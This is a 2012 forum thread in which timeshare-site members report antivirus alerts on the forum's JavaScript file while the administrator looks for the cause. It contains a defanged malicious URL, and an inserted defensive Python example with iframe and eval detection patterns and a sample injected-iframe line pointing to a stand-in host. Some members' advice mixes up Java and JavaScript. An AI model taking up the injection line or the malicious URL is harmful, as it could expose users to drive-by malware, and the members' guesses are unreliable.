# AVG Anti-Virus 2012 Starting to Block TUGBBS webpages!



## w.bob (Sep 5, 2012)

This never happened before. While going from one forum to another I get a red pop up message. It is from my AVG account.

"AVG Linkscanner Alert
!Threat was blocked!

File name:69.16.236.4/~tugbbsc/forums/clientscript/vbulletin_global.js?v=364

Threat name: Exploit Phoenix Exploit Kit (type 769)

Anyone else experience anything like this?


----------



## Renny30 (Sep 5, 2012)

w.bob said:


> This never happened before. While going from one forum to another I get a red pop up message. It is from my AVG account.
> 
> "AVG Linkscanner Alert
> !Threat was blocked!
> ...



Yes, I've been getting it a lot.


----------



## scootr5 (Sep 5, 2012)

No, but I've been getting errors the last few days about not being able to load script when I try to access page.


----------



## SailBadtheSinner (Sep 5, 2012)

You are not alone, I started receiving the message at about 2pm whenever I connected to TUG -








SBtS


----------



## cotraveller (Sep 5, 2012)

I received a Norton message when I accessed the TUG BBS a few minutes ago.

"*An intrusion attempt by presider.pro was blocked*"

The attacking computer was listed as presider.pro which dns lookup reports as being on a Moscow server.  The ip address lookup shows as being in Scranton, PA.  Might there be some address spoofing going on?


----------



## TUGBrian (Sep 5, 2012)

i will begin looking into this.


----------



## Passepartout (Sep 5, 2012)

Me too. Getting it every time I refresh or click on a thread. Looks exactly like the one in post #4. Just started about 11 EDT. On the one hand I'm glad AVG is working,  but on the other, I wish it wasn't necessary.

Jim


----------



## jackio (Sep 5, 2012)

I just got the same message using Norton. - Jacki


----------



## ace2000 (Sep 5, 2012)

Don't know if it's related, but at some point this morning around 9am CST, I was not able to load the TUG page.  The error was referring to a cron job - I believe it was a backup.


----------



## Quiet Pine (Sep 5, 2012)

I'm getting an error message too from Kaspersky Anti-Virus. It has popped up several times, warning about a threat and a Trojan. This morning all was fine.


----------



## theo (Sep 5, 2012)

*Me too...*

Upon visiting TUG today at about 6:15 p.m., my Avast anti-virus immediately indicated that a "Trojan Horse" virus had been successfully blocked. Further details disappeared before I could write down the virus description details.


----------



## MichaelColey (Sep 5, 2012)

I've been getting this error this afternoon, too. This is the same error that we were getting a few months ago:

http://tugbbs.com/forums/showthread.php?t=172116

Did anyone ever figure out what happened then?  Or did it just stop?


----------



## Picker57 (Sep 5, 2012)

Yep, I'm getting them just this afternoon, but now about every 5 minutes. 

                 -----Zach


----------



## BM243923 (Sep 5, 2012)

Same thing, I signed on a few minutes  ago and message keeps popping up about threat blocked avg alert


----------



## ricoba (Sep 5, 2012)

I feel left out, since I have *not* gotten it!


----------



## Passepartout (Sep 5, 2012)

Don't know if it's related, but I don't seem to be able to underline or bold, or italicize or change color of TUG posts. Smilies don't work either. None of the message formatting seems to work.

Jim


----------



## dioxide45 (Sep 5, 2012)

No issues here, what browser is everyone using? I am on Chrome.


----------



## dioxide45 (Sep 5, 2012)

BM243923 said:


> Same thing, I signed on a few minutes  ago and message keeps popping up about threat blocked avg alert



Your avatar is showing as a broken image, is that by design?


----------



## Beaglemom3 (Sep 5, 2012)

Me, too. Got a Webroot threat warning.


----------



## TheWizz (Sep 5, 2012)

I have never had this problem until a few days ago and now I keep getting pop-up messages from AVG stating that they are detecting an "infection" from tugbbs.com in the form of a "Exploit Phoenix Exploit Kit (769)".  I get this infection alert from either Internet Explorer or Firefox.  I got an alert the other day that AVG was doing some sort of software update and it seems the problems started then.  Was wondering if anyone else had this issue and if they were able to resolve it.  Quite frustrating...


----------



## DeniseM (Sep 5, 2012)

We have a new Mod (Sue) on the Marriott forum, and well..... she's dangerous.


----------



## piper_chuck (Sep 5, 2012)

*Trojan reported by Antivirus software*

My antivirus/firewall software just started reporting a Trojan every time I do anything here. Here's the info:

Type: Trojan program (1)	
HEUR:Trojan.Script.Iframer	Inactive	9/5/2012 8:52:38 PM	

It shows it as coming from:
http://tugbbs.com/forums/clientscript/vbulletin_global.js?v=364


----------



## BM243923 (Sep 5, 2012)

dioxide45 said:


> Your avatar is showing as a broken image, is that by design?



No that is new also no avatar

I put a new avatar today and seems like it likes this one


----------



## DeniseM (Sep 5, 2012)

BM243923 said:


> No that is new also new avatar



No picture visible - only text:  BM243923's Avatar


----------



## SueDonJ (Sep 5, 2012)

DeniseM said:


> We have a new Mod (Sue) on the Marriott forum, and well..... she's dangerous.



I warned you I might break TUG!  :rofl: 

As long as I'm here I may as well report - I'm not getting any of the issues that others are reporting in this thread but since about 5 this evening TUG has been running very slowly and whatever it is, it doesn't appear to be affecting the other sites I've viewed.

(The other tech issue I reported to TUG yesterday, about the Google Search error message, appears to be resolved.)

For what it's worth, I'm running Safari on a Mac.


----------



## T_R_Oglodyte (Sep 5, 2012)

Just logged on today for the first time since last night.  My AVG is reporting the Phoenix threat almost every time I open a page.

Using Firefox.


----------



## Tacoma (Sep 5, 2012)

I too was getting that message every page.  My husband switched my browser to google chrome and it seems to be working fine.  So try a new browser.  Thank heavens my husband is a techie.

Joan


----------



## amycurl (Sep 5, 2012)

I'm running Firefox on a Mac. I also checked TUG at the end of the work day on my brand-new Lenovo laptop, running Chrome and Norton 360, and didn't have a problem.


----------



## Passepartout (Sep 5, 2012)

Just switched to Chrome. AVG is showing active threats here, but no pop-ups appear. Formatting, underlining, *bold* is working with Chrome- which doesn't seem to work using Firefox.

Jim


----------



## mas (Sep 5, 2012)

I haven't seen the problem here, using Chrome and AVG, however, it took about five tries and about 5 minutes to open a thread on the Marriott board--buying back timeshares.  I kept seeing pages that google couldn't open the page or that it was taking too long.


----------



## Talent312 (Sep 5, 2012)

I use IE9 and Avast!... and just got the message:
avast! blocked the virus:
http://www.tugbbs.com/forums/clientscript/vbulletin_global.j...

But so far, no ill effects seen.


----------



## easyrider (Sep 6, 2012)

ricoba said:


> I feel left out, since I have *not* gotten it!



Me too !!! Everything is fine. I'm not using AVG or Norton. I'm using microsoft security essentials and chrome.

Bill


----------



## debraxh (Sep 6, 2012)

I was getting the error using IE, and in fact could not even read the message because the thread wouldn't load!  Switched to Chrome -- same computer same AVG -- no problem now.


----------



## Ron98GT (Sep 6, 2012)

No problems here.  

One computer runs Windows 7 Professional, IE9, Firefox 15.0, and McAfee antivirus.

Two computers that run Windows XP Professional, IE7, Firefox 15.0, and Trend Micro antivirus.

So far, so good.


----------



## ricoba (Sep 6, 2012)

easyrider said:


> Me too !!! Everything is fine. I'm not using AVG or Norton. I'm using microsoft security essentials and chrome.
> 
> Bill



I am using IE 9, Windows 7 and Norton 360.


----------



## TUGBrian (Sep 6, 2012)

very bizarre indeed.


----------



## TUGBrian (Sep 6, 2012)

Talent312 said:


> I use IE9 and Avast!... and just got the message:
> avast! blocked the virus:
> http://www.tugbbs.com/forums/clientscript/vbulletin_global.j...
> 
> But so far, no ill effects seen.



this file doesnt even exist on the server...so weird


----------



## TUGBrian (Sep 6, 2012)

our host claims they have run a malware scan twice now and come up with nothing wrong with the server....we will however continue to dig into this as something is certainly triggering your antivirus software.


----------



## KauaiMark (Sep 6, 2012)

*Same here...*



piper_chuck said:


> My antivirus/firewall software just started reporting a Trojan every time I do anything here. Here's the info:
> 
> Type: Trojan program (1)
> HEUR:Trojan.Script.Iframer	Inactive	9/5/2012 8:52:38 PM
> ...




HEUR:Trojan.Script.Iframer

Accessed Using FireFox V14-1.0
                      funnecake Jul 2012

triggers using either FireFox or IE9

Was able to access TUG using Chrome browser w/o triggering the Kaspersky Trojan warning.

...Mark


----------



## PearlCity (Sep 6, 2012)

Getting the same thing. It actually infected my other computer that didnt have a firewall.  I'm on one with a firewall now..


----------



## TUGBrian (Sep 6, 2012)

so bizarre...my av software picks up nothing on firefox or chrome browsers...both spybot and MBAM scans show nothing infected (and i even disabled av and browsed)...

i can only guess this at the moment is a false positive...but id still like to find out whats causing it and fix it.


----------



## theo (Sep 6, 2012)

*Still there a day later...*

Detected again today, indicated by Avast Anti-Virus software as a Trojan Horse virus JS:Redirector-MA. Successfully blocked, but obviously still an issue. Meanwhile, can't access "smilies" (not a huge problem)...

P.S. Fwiw, I use IE8 and Windows XP --- in my quest to stay a decade behind the times.


----------



## Htoo0 (Sep 6, 2012)

I'm getting it too. Each time I change pages. www.tugbbs.com/forums/clientscript/vbullentin_global.js?v=364 Threat name: Exploit Phoenix Exploit Kit (type 769)  AVG, Firefox and XP


----------



## GetawaysRus (Sep 6, 2012)

Guess I'm not alone.  I also use Avast.  Got a "Trojan Horse blocked" message.  It refers to something called JS:Redirector-MA


----------



## TheWizz (Sep 6, 2012)

I get the AVG blocks on IE and FF, but not Chrome.  However, on all the browsers, the "Quick Links" menu bar for seeing your posts, new posts, etc. is missing.


----------



## Passepartout (Sep 6, 2012)

I 'upgraded' my AVG to the paid version this morning in the hope that it might do a better job dealing with this Phoenix threat. Reporting no difference. The 'Quick Links' above disappears when clicked on. Still can't change formatting like, underlining, bolding. Smilies don't work. Spell check seems to work, though. 

If your AVG freebie seems to be working, it's probably as good as the paid one. The above is using a PC/Win7/Firefox. Chrome reports risks and reports them, but seems functional- except that Quick Links is AWOL entirely.

Jim


----------



## Fern Modena (Sep 6, 2012)

I'm using Chrome and AVG Paid for virus, and Previx for malware.  No problems at all. 

I think Firefox is part of the problem.  I've pretty much quit using Firefox because it is a huge memory hog and doesn't seem to return memory when you close tabs. Chrome development is far enough along that they have every extension, etc. that I want.

I do a full virus scan weekly and update my definitions automatically so they are always current.  If you guys are having problems, have you done both of those things since the "problem" has started?

This isn't the first time we've had this, btw.

Fern


----------



## klpca (Sep 6, 2012)

I'll add my little data points. 

No issues on iPad (safari) or iPhone

No issues at work yesterday using Firefox. I'm not sure what antivirus we're using. It used to be Kaspersky but I think the IT guy changed it recently. I'll see if I can figure it out later.

I get the warning at home using firefox/avast.


----------



## timeos2 (Sep 6, 2012)

Running Firefox almost exclusively on my PC, Opera / Internal browsers on my Android and the internal browser on my Touchpad (WebOS). All but the Touchpad have Trend Micro Internet Security, which I have used for over 10 years and never had a malware or virus get by on any of my 6+ family PC's or phones.  No reported errors on any of the various access OS/hardware for this site. 

Just to see what would happen I opened IE (HELP!!) & logged into the BBS. Have all the various menus, etc - no problem and no warnings. 

I have noticed that over time the cookies, or whatever sets the state of your current session, on virtually any access method can "lose" the ability to display the "Quick Links" option. If I clear everything when that happens the menu returns (usually). I'm really not sure why that can occur. I've seen it where one PC will have lost the menu if I log in while another uses it just fine so I believe it is a local machine issue. 

As for the current error being reported I am guessing that it is due to an outdated Java version. The errors/warnings appear to point to that. If someone getting the error can make sure they have updated their Java version AND removed all prior versions I'll bet it goes away.  

Keeping your Java up to date is very important for security as it holds high user rights. It is basically far more secure and reliable than the various MS scripting disasters but you must apply the security upgrades as they are released to be protected.   

Closing IE now (thankfully) so that threat to my pc is now mostly removed. If it weren't for the many & frequent MS patches I'd get rid of it entirely.


----------



## timeos2 (Sep 6, 2012)

UPDATE: 

Interesting that on my Trend Micro Log two "web threats" were blocked when I opened TUGBBS.COM under IE - not Firefox - a few minutes ago. I did not get a pop up only a log entry. Here is the link it blocked - once when I clicked on the "Quick Links" menu and once when I clicked "New Posts" in IE:

ttp://presider.pro/d77bsczxwvebzam
(left off the leading h so link is dead - don't go there!)

Maybe this will help track down whatever is occurring.


----------



## pranas (Sep 6, 2012)

I had no problems yesterday or today.


----------



## Ron98GT (Sep 6, 2012)

theo said:


> Detected again today, indicated by Avast Anti-Virus software as a Trojan Horse virus JS:Redirector-MA. Successfully blocked, but obviously still an issue. Meanwhile, can't access "smilies" (not a huge problem)...
> 
> P.S. Fwiw, I use IE8 and Windows XP --- in my quest to stay a decade behind the times.



XP Home or Professional?

just wondering since, in the past I've found XP Home more susceptible to Internet problems, with Professional being more stable.


----------



## Ron98GT (Sep 6, 2012)

timeos2 said:


> Running Firefox almost exclusively on my PC, Opera / Internal browsers on my Android and the internal browser on my Touchpad (WebOS). All but the Touchpad have Trend Micro Internet Security, which I have used for over 10 years and never had a malware or virus get by on any of my 6+ family PC's or phones.  No reported errors on any of the various access OS/hardware for this site.
> 
> Just to see what would happen I opened IE (HELP!!) & logged into the BBS. Have all the various menus, etc - no problem and no warnings.
> 
> ...



Virus found in Java:

http://www.java.com/en/download/help/cache_virus.xml

Recent Java bug fix:

http://newyork.newsday.com/business...s-oracle-fixes-security-bugs-in-pcs-1.3939510

More about recent Java bugs:

http://www.h-online.com/security/news/item/Warning-on-critical-Java-hole-1676219.html

Virus scanners & java bug:

http://www.h-online.com/security/ne...irus-scanners-block-Java-exploit-1696462.html


Java, version-7, update-6, buggy  

So, sounds like a Java problem.  Hits PC's & Mac's.


----------



## timeos2 (Sep 6, 2012)

The correct current Version of up to date Java is Java 7 Update 7. Anything before that could be a problem & should be replaced. 

While Java is very secure any software can be compromised. That is why they stay on top of it with timely updates unlike Active X & others that don't do regular updates or hold them for a predetermined release date. Not as safe as during the time when exploits are known but not corrected your machine(s) are at risk. 

Check your Java version. If it isn't 7 Update 7 then download the update.


----------



## TUGBrian (Sep 6, 2012)

our host did run a separate scan and found a few files that shouldnt be there (although some are on the test installation, and wouldnt even impact this forum even if it were malicious)

will keep everyone updated...hopefully removing these files will eliminate this issue.


----------



## TUGBrian (Sep 6, 2012)

ok..weve removed the last of the potentially suspected files...please those of you who can repeat the warnings let me know if they still pop up!


----------



## Passepartout (Sep 6, 2012)

Don't know if it has anything to do with this or any other problem, but as suggested by John upthread a couple, I checked my Java. I found that mine had updated to the latest version just yesterday, a few hours before the Phoenix began manifesting itself every time I click on a TUG page or link. Coincidence?

Btw, AVG is still showing the problem, and still won't allow smilies or any of the formatting above and the Quick Links in the blue bar are still scrambling and disappearing.

Jim


----------



## TUGBrian (Sep 6, 2012)

maybe if we can identify a few other users who recently updated java (which would certainly impact quicklinks btw)...we can find a better solution!


----------



## TUGBrian (Sep 6, 2012)

does your java installation have a rollback feature by chance?


----------



## TUGBrian (Sep 6, 2012)

believe (but not positive) that this would also explain why it doesnt impact chrome.


----------



## sun starved Gayle (Sep 6, 2012)

Just came up for me.


----------



## Passepartout (Sep 6, 2012)

I didn't notice a rollback feature on the Java panel, but will go back and look for that. 
Chrome's performance doesn't seem affected,  but my AVG does detect the bug and I get a red, 'caution' shield wherever the TUG site is open.


----------



## GetawaysRus (Sep 6, 2012)

TUGBrian said:


> maybe if we can identify a few other users who recently updated java (which would certainly impact quicklinks btw)...we can find a better solution!



I posted upthread a page or so ago.  My anti-virus program is Avast.  I use Windows 7.

Avast updates itself automatically, sometimes even more than once daily.  So I'm certain that I've got the latest virus definitions file.

And yes, I did receive notice of a Java update (and allowed it to install) just yesterday.  However, I have not received the Trojan warning on any other webpage so far - just TUG.

It may not be related, but I also have another anti-spyware program running in the background.  This program is called Spyware Blaster (free version).  I update Spyware Blaster manually when I remember to do it.  I have not updated it within the past few days, however.


----------



## TUGBrian (Sep 6, 2012)

for those of you who repeat the error, can you post as MUCH information regarding the warning as possible here (or email it to me at tug@tug2.net if it contains personal/computer info)

also if we could identify your web IP address, it would help the host identify a problem in the logs easier.


----------



## Passepartout (Sep 6, 2012)

No lookback feature that I can discern in the Java control panel.

It will be interesting to see if those affected got Java updates just before the problem showed itself. If you open the Java control panel it shows date/time of the last update. 

What I see is identical to the screenshot in post #3- just a different version since I upgraded today to the new, paid version of AVG

Jim


----------



## TUGBrian (Sep 6, 2012)

is there anything in the "more info" link?


----------



## Picker57 (Sep 6, 2012)

Passepartout said:


> No lookback feature that I can discern in the Java control panel.
> 
> It will be interesting to see if those affected got Java updates just before the problem showed itself. If you open the Java control panel it shows date/time of the last update.
> 
> ...



FUNNY YOU SHOULD MENTION.... Yes, I did just recently do the Java upgrade thingy.  Also, since this issue began I'm not able to change text fonts or sizes when I post.  I THINK I'm running IE on this computer, though I see the Firefox icon also.  AVG is my antivirus.  Fingers crossed.....

           -----Zach


----------



## TUGBrian (Sep 6, 2012)

so odd...we have scoured that .js file with a fine tooth comb, and can confirm theres nothing wrong with it.

*sigh


----------



## timeos2 (Sep 6, 2012)

From all this I have to assume that the site is on a Windows based host. Unfortunately Windows allows some behind the scenes and virtually impossible to diagnose changes to settings such as a default redirect that nothing short of a reload is able to clear. I've seen multiple machines including servers with that issue in the past and no amount of cleaning or code searches can identify just what got altered or where. I hope this isn't the case with this problem.  Another reason we use Unix/Linux based hosts exclusively.


----------



## Ron98GT (Sep 6, 2012)

GetawaysRus said:


> I posted upthread a page or so ago.  My anti-virus program is Avast.  I use Windows 7.
> 
> Avast updates itself automatically, sometimes even more than once daily.  So I'm certain that I've got the latest virus definitions file.
> 
> ...



I received the notice yesterday also, but I clicked "NO".

Late last year, one of my computers and the attached external hard-drive got infected from an Adobe update.  It was so bad that I had to replace the hard-drive & then update to Windows 7 Professional.  There is a lot of info on the Internet about computer viruses associated with Adobe updates - be aware, and never allow an automatic update for an Adobe product.  If there is an update and you verified that it's safe, go to the Adobe web site and download it.  In the past I've received update notices, gone to the vendor's web site, and found that no updates were available, but a virus would have been downloaded.


----------



## TUGBrian (Sep 6, 2012)

timeos2 said:


> From all this I have to assume that the site is on a Windows based host. Unfortunately Windows allows some behind the scenes and virtually impossible to diagnose changes to settings such as a default redirect that nothing short of a reload is able to clear. I've seen multiple machines including servers with that issue in the past and no amount of cleaning or code searches can identify just what got altered or where. I hope this isn't the case with this problem.  Another reason we use Unix/Linux based hosts exclusively.




the server that runs the forum is a linux server.


----------



## Passepartout (Sep 6, 2012)

OK, I have just done a System Restore and reset it to 9/4, before the Java update (or for that matter the AVG update, though after a scan). So far the result is no alert for a virus, Trojan Horse, Viking Ship, or unicorns on the loose. I am getting a notification for a Flash update- which I have declined. I may try doing these system changes one-by-one and try to trap the culprit.

Stay tuned.....

Jim


----------



## TUGBrian (Sep 6, 2012)

I appreciate all the time you are taking to help out with this Jim!


----------



## TUGBrian (Sep 6, 2012)

can you use this link

whatismyip.liquidweb.com

to email/pm me your ip address please?


----------



## timeos2 (Sep 6, 2012)

TUGBrian said:


> the server that runs the forum is a linux server.



Interesting.  Never saw an error like this on one of those.  Makes it more likely that it is a redirect on the client computers that may only occur in specific configurations.  Your purge of the server should assure it is now clean but the clients may be acting to keep the malware alive (acting as bots).  Tough to counter if that's what occurred.


----------



## TUGBrian (Sep 6, 2012)

well its definitely only happening to a small % of individuals...based on past "issues" and more importantly the earlier "redirect from google links" issue (which is purely subjective, i base it on how many calls/emails i get telling me about the problem)...

I still want it fixed however!


----------



## Passepartout (Sep 6, 2012)

Well, let's see here, I am back to my usual Firefox Beta 16. Looks like *BOLD* _Italics_, underlining, color, and smilies seem to be working like they were 2 days ago. I'll check the Quick Links in the blue stripe now but will assume it will work normally as well. ADDED: Yup, Quick links works normally.

If I were a gambler, I'd say the Java update of 9/6 is the culprit.

Jim


----------



## TUGBrian (Sep 6, 2012)

i posted something in the thread up top regarding the "weird things" people were seeing in the forum (not virus related)...see if we can get a few more to confirm this.

wonder if its an issue with the java update, or just that the forum has gotten so old...its no longer compatible with the new update.


----------



## timeos2 (Sep 6, 2012)

TUGBrian said:


> i posted something in the thread up top regarding the "weird things" people were seeing in the forum (not virus related)...see if we can get a few more to confirm this.
> 
> wonder if its an issue with the java update, or just that the forum has gotten so old...its no longer compatible with the new update.



It doesn't appear to be the Java version as I'm on the latest on multiple platforms with no issues.  It may be a version issue with the programs that are showing the error &  their interaction with Java.  Right now I'd guess that is the most likely answer.  As AVG etc are updated the problem will cease.


----------



## Passepartout (Sep 6, 2012)

TUGBrian said:


> wonder if its an issue with the java update, or just that the forum has gotten so old...its no longer compatible with the new update.



What if you got with the Java folks and told them that a fair number of your members experienced a problem that manifested itself after a Java update and was resolved after a system restore to a point before the update? I'm sure that TUG couldn't be the only affected site.

Anyway, however it goes, I'm relieved to not have the warning/notification every time I click on a TUG link. 

Thanks Brian for your concern and sticking with this.

Jim


----------



## TUGBrian (Sep 6, 2012)

i think at the very least...we can confirm (with a good amount of certainty) that it is a false positive either way.


----------



## Picker57 (Sep 6, 2012)

Ron98GT said:


> I received the notice yesterday also, but I clicked "NO".
> 
> Late last year, one of my computers and the attached external hard-drive got infected from an Adobe update.  It was so bad that I had to replace the hard-drive & then update to Windows 7 Professional.  There is a lot of info on the Internet about computer viruses associated with Adobe updates - be aware, and never allow an automatic update for an Adobe product.  If there is an update and you verified that it's safe, go to the Adobe web site and download it.  In the past I've received update notices, gone to the vendor's web site, and found that no updates were available, but a virus would have been downloaded.



Yikes....that's scary!  I've been automatically updating everything, figuring it was always fixing some unknown bug.  Thanks for posting. 

          ------------Zach


----------



## timeos2 (Sep 6, 2012)

Picker57 said:


> Yikes....that's scary!  I've been automatically updating everything, figuring it was always fixing some unknown bug.  Thanks for posting.
> 
> ------------Zach



Generally speaking it is usually best to do updates as they are announced officially by the vendor especially if it is called a security issue. But do require that it be a manual install not automatic & verify with the manufacturer website that it is really from them.

Some that you almost can't avoid are the Microsoft Windows ones. While I used to pick & choose those too it became impossible to know as an end user what was OK and what was likely to cause more problems! So I went to download but don't install, wait a couple days after they are released and if all appears OK and no "uh-oh's" posted on known sites like InfoWorld or PC Mag, etc then I allow them to install.  If you don't you are at serious risk as they can muck around with settings you can never fix again!

Often an update to one program - such as Java, Firefox, your anti-virus, etc will cause issues with other programs that utilize those services until the OTHER programs are also updated.  That I live with as security is more important than the latest gizmo.  Using this method I have had no infections on my primary pc's in over 10 years.  Much of that success I give to the excellent Trend Micro services that have never failed me.

Even my "secondary" pc's - my daughters & wife's as well as those I use for servicing other's broken/infected PC's have had few issues all of which were easily repaired again with Trend Micro & AVG as the protection.  You need that as the primary defense.


----------



## Ron98GT (Sep 6, 2012)

timeos2 said:


> It doesn't appear to be the Java version as I'm on the latest on multiple platforms with no issues.  It may be a version issue with the programs that are showing the error &  their interaction with Java.  Right now I'd guess that is the most likely answer.  As AVG etc are updated the problem will cease.



"All versions of the 7.x branch of Java are affected. In tests, the exploit worked under Windows with all popular browsers including Google Chrome."

per The H Security

Note that the bug/virus also hits Mac's (Linux/Unix based operating system), so they are not immune.


----------



## MichaelColey (Sep 6, 2012)

I'm still getting the error, as well.


----------



## Passepartout (Sep 6, 2012)

timeos2 said:


> Some that you almost can't avoid are the Microsoft Windows ones. While I used to pick & choose those too it became impossible to know as an end user what was OK and what was likely to cause more problems! So I went to download but don't install, wait a couple days after they are released and if all appears OK and no "uh-oh's" posted on known sites like InfoWorld or PC Mag, etc then I allow them to install.
> Even my "secondary" pc's - my daughters & wife's as well as those I use for servicing other's broken/infected PC's have had few issues all of which were easily repaired again with Trend Micro & AVG as the protection.



As I found out earlier today, doing the Windows updates as offered, gives you a handy place to go to with System Restore. It offers you several restore points that coincide with significant software installs and upgrades. I was able to go back to a point less than 48 hours ago- only 18 hours from when the problem manifested itself.

Jim


----------



## pjrose (Sep 6, 2012)

No TUG problems here, using Safari on Mac and iPad.  

'course I did get the weird multi-dolphin screen a few months ago, so I don't feel left out.


----------



## Passepartout (Sep 6, 2012)

MichaelColey said:


> I'm still getting the error, as well.



We think that the problem can be solved if you do a system restore to before yesterday morning when Java did an update. That fixed mine anyway. See post #72
Jim


----------



## KauaiMark (Sep 6, 2012)

*from the logs...*



TUGBrian said:


> so bizarre...my av software picks up nothing on firefox or chrome browsers...both spybot and MBAM scans show nothing infected (and i even disabled av and browsed)...
> 
> i can only guess this at the moment is a false positive...but id still like to find out whats causing it and fix it.



This is the log item from the Kaspersky logs if it helps:

vbulletin_global.js?v=364	Detected: HEUR:Trojan.Script.Iframer	9/6/2012 3:18:59 PM


----------



## TUGBrian (Sep 6, 2012)

yea, the global.js file has been gone over countless times at this point, (its not a super long file...content wise)...while its clear its triggering the alert...there is no malware or calls to malware inside it.

it is 100% identical to the global.js file we have from previous backup files (that existed long before this alert came around)


----------
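Added example, not part of any post in this thread: one way to check a script that keeps triggering alerts is to save the copy a browser actually receives and compare it with the known-good backup, listing every added line and flagging those that contain frame-injection markers. The function names, the marker list and both sample scripts are constructed for illustration.

```python
import difflib
import hashlib
import re

# Heuristic markers often seen in injected redirect/iframe code. This list is
# an assumption for the example, not any antivirus product's signature set.
MARKERS = {
    "iframe-tag": re.compile(r"<\s*iframe", re.I),
    "iframe-element": re.compile(r"createElement\s*\(\s*['\"]iframe['\"]", re.I),
    "document.write": re.compile(r"document\.write(ln)?\s*\(", re.I),
    "eval": re.compile(r"\beval\s*\(", re.I),
    "char-decoding": re.compile(r"\bunescape\s*\(|fromCharCode", re.I),
}


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def added_lines(known_good: bytes, served: bytes):
    """Return (line_number, text) for lines in `served` that are not in `known_good`."""
    a = known_good.decode("utf-8", errors="replace").splitlines()
    b = served.decode("utf-8", errors="replace").splitlines()
    matcher = difflib.SequenceMatcher(None, a, b, autojunk=False)
    added = []
    for tag, _i1, _i2, j1, j2 in matcher.get_opcodes():
        if tag in ("insert", "replace"):
            added.extend((j + 1, b[j]) for j in range(j1, j2))
    return added


def compare_script(known_good: bytes, served: bytes) -> dict:
    """Compare the served copy with the backup and flag suspicious additions."""
    added = added_lines(known_good, served)
    flagged = []
    for line_no, text in added:
        hits = sorted(name for name, rx in MARKERS.items() if rx.search(text))
        if hits:
            flagged.append((line_no, hits))
    return {
        "backup_sha256": sha256_hex(known_good),
        "served_sha256": sha256_hex(served),
        "identical": known_good == served,
        "added": added,
        "flagged": flagged,
    }


# Constructed sample data: a stand-in for a forum's global script as kept in
# a backup, and the same script with one line appended as a browser might
# receive it. Neither is taken from the site discussed in this thread.
BACKUP_JS = b"""// constructed stand-in for a forum's global script
function toggle_menu(id) {
    var el = document.getElementById(id);
    el.style.display = (el.style.display == 'none') ? '' : 'none';
}
"""

SERVED_JS = BACKUP_JS + b"""document.write('<iframe src="http://injected.example.invalid/" width="1" height="1"></iframe>');
"""

if __name__ == "__main__":
    report = compare_script(BACKUP_JS, SERVED_JS)
    print("identical:", report["identical"])
    for line_no, text in report["added"]:
        print(f"added line {line_no}: {text}")
    for line_no, hits in report["flagged"]:
        print(f"flagged line {line_no}: {', '.join(hits)}")
```

An empty `added` list with matching hashes means the received bytes equal the backup, so the alert has to be explained by something other than this file's content.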



## Kozman (Sep 6, 2012)

Just got a similar alert with Avast.


----------



## Elan (Sep 6, 2012)

No problems here (running Chrome/Win7).  I did have TUG weirdness yesterday morning at work (Firefox on Linux), but I didn't pay attention to the error message, and the issue resolved quickly.


----------



## dioxide45 (Sep 6, 2012)

I checked our Java version and it is currently running version 6, last updated on 8/10.

The fool that I was, I thought I would open up IE and go to TUG. Instantly McAfee was trying to block a Trojan. It wasn't overly successful as I had a program popup in my toolbox indicating the PC was infected and to run a scan using that program. It appears to be a program that tries to get you to accidentally run it to remove a non existent virus then they will try to extort money from you to get rid of the virus. I didn't run anything and did a restart. There was also a link on the desktop to a file on the C:\Program Data folder. I deleted the link and the files. Running a full virus scan now. Back in Chrome now.


----------



## TUGBrian (Sep 6, 2012)

ugh...i absolutely hate those.

did you get it just from going to the TUG homepage?  or a bookmarked link?  or thru google?


----------



## Passepartout (Sep 6, 2012)

It's Baaaack! I just updated AVG (Free) and restarted the computer. It reports the same infection as before, 

Name: Exploit Phoenix Exploit Kit (type 769)

Object name: www.tigbbs.com/forums/clientscript/vbulletin_global.js?v=364

Sorry, I thought we had it figured out.

Jim


----------



## dioxide45 (Sep 6, 2012)

TUGBrian said:


> ugh...i absolutely hate those.
> 
> did you get it just from going to the TUG homepage?  or a bookmarked link?  or thru google?



I access Tug through a bookmark to the UserCP page. I had surfed around the BBS a little before I got the warning. So I don't know where it is coming from exactly. I also use a computer using IE 6.0 that has not had the problem. However on that computer, I am never logged in to the forums.

_ETA: It created a folder with the following name: 036DFF85030E158B02ABE9FA2F3B707C. The exe file was in that folder, it has been purged from my recycle bin, so I can't tell you the file name exactly._


----------



## dioxide45 (Sep 6, 2012)

Passepartout said:


> It's Baaaack! I just updated AVG (Free) and restarted the computer. It reports the same infection as before,
> 
> Name: Exploit Phoenix Exploit Kit (type 769)
> 
> ...



Perhaps the updated definitions of AVG include this new threat where the old one didn't?


----------



## theo (Sep 6, 2012)

Ron98GT said:


> XP Home or Professional?



XP Professional, IE8 as browser. Still getting the "Trojan Horse virus successfully blocked" message this evening immediately upon visiting TUG (before even logging in).


----------



## Passepartout (Sep 6, 2012)

Boy, I don't know. I did another system restore to an hour ago, and it is back to working fine. I still have virus protection AVG free 2012 (not '13) I think, and updated my superantispyware. It had not refreshed for some time, so I just reloaded it.

I may just use Chrome for my TUG BBSing for a while.  Oh, the custom formatting and smilies went away too, and the Quick Links above. All is back on my computer now, though. 

This is a PITA!

Jim


----------



## Elan (Sep 6, 2012)

Here's a link to another forum where there was a similar issue.  Don't know if it's any help, but......

http://badgerandblade.com/vb/showthread.php/271944-Malware-warning-again-Resolved


  Here's the nature of the issue from an admin:

"We've discovered the source of this (Caused by an out of date no longer in-use script that was never removed from the server and subsequently exploited)

We are clean now, but AVG will continue to pop those warnings up until it is cleared from their warning cache."


----------



## dioxide45 (Sep 6, 2012)

timeos2 said:


> Closing IE now (thankfully) so that threat to my pc is now mostly removed. If it weren't for the many & frequent MS patches I'd get rid of it entirely.



John, I thought you were _"Proudly *Microsoft* & Apple *free* with WebOS, Droid Bionic & Verizon Wireless"_. If that is the case, why would you be needing to obtain the frequent MS patches?


----------



## va_traveller (Sep 6, 2012)

Ron98GT said:


> Virus found in Java:
> 
> http://www.java.com/en/download/help/cache_virus.xml
> 
> ...



Just to set some information straight. I am getting the avast warning steadily still. The warning is about a JAVASCRIPT file (.js). I have been a web developer for going on 14 years, and have been a java certified developer since 1998. javascript and java have no relationship to each other except for the name. Java is a programming language that can be used to create huge applications, applets, etc. javascript is a scripting language that runs inside a browser (formerly called LiveScript). The warnings we are seeing will not be solved by "upgrading your java".

I don't want anyone to get a false sense of security by looking @ upgrading java on their computer. The issue is server side, not client side.

Greg.


----------



## timeos2 (Sep 6, 2012)

dioxide45 said:


